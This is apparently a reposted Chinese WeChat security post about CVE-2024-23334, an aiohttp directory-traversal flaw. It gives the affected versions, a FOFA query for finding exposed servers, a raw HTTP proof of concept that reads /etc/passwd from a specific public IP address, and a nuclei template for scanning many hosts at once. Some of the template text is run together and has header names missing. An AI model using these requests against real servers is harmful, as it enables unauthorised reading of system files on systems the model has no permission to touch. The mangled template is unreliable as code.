微信公众号:[小白安全工具] 分享安全工具与安全漏洞。问题或建议,请公众号留言。该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任。
漏洞简介
Aiohttp受影响版本中,当使用aiohttp作为web服务器并配置静态路由时,需要指定静态文件的根路径。选项“follow_symlinks”可用于确定是否遵循静态根目录之外的符号链接,当该选项设置为True时,不会验证给定的文件路径是否在根目录中,可能导致目录遍历漏洞,从而可能导致未经授权访问系统上的任意文件。
脚本GitHub 地址:https://github.com/ibaiw/nuclei_templates/blob/main/cve-2024-23334.yaml
漏洞影响版本
1.0.5 < aiohttp < 3.9.2
资产测绘
fofa:app="aiohttp"
POC
GET /static/../../../../../../etc/passwd HTTP/1.1Host: 36.139.139.79:2082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: */*Referer: http://36.139.139.79:2082/Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7Connection: close
批量脚本
id: CVE-2024-23334info:name: aiohttpauthor: weehhdseverity: mediumdescription: aiohttp路径遍历漏洞(CVE-2024-23334)reference:https://tags: tagshttp:raw:|+GET /static/../../../../../../etc/passwd HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: */*: gzip, deflate, br: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7Connection: close: andmatchers:type: wordpart: bodywords:roottype: wordpart: headerwords:200 OK
原文始发于微信公众号(小白安全工具):AIOHTTP目录遍历漏洞演示(CVE-2024-23334)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论